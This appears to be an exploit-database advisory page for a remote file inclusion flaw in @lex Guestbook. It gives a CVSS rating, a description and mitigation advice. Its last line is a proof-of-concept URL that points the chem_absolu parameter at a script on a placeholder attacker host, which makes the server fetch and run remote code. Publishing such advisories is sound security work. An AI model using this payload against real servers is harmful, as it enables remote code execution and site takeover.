header-logo
Suggest Exploit
vendor:
@lex Guestbook
by:
Unknown
7.5
CVSS
HIGH
Arbitrary Code Execution
94
CWE
Product Name: @lex Guestbook
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:lexphpteam:lex_guestbook
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Arbitrary Code Execution in @lex Guestbook Software

A vulnerability is reported to exist in the @lexPHPTeam @lex Guestbook software that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system. The issue exists due to improper validation of user-supplied data. Remote attackers could potentially exploit this issue via a vulnerable variable to include a remote malicious PHP script, which will be executed in the context of the web server hosting the vulnerable software.

Mitigation:

Properly validate and sanitize user-supplied data before including it in PHP scripts. Apply necessary security patches or updates provided by the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11260/info

A vulnerability is reported to exist in the @lexPHPTeam @lex Guestbook software that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system. The issue exists due to improper validation of user-supplied data.

Remote attackers could potentially exploit this issue via a vulnerable variable to include a remote malicious PHP script, which will be executed in the context of the web server hosting the vulnerable software.

http://www.example.com/include/livre_include.php?no_connect=lol&chem_absolu=http://[attacker]/file.ext%3f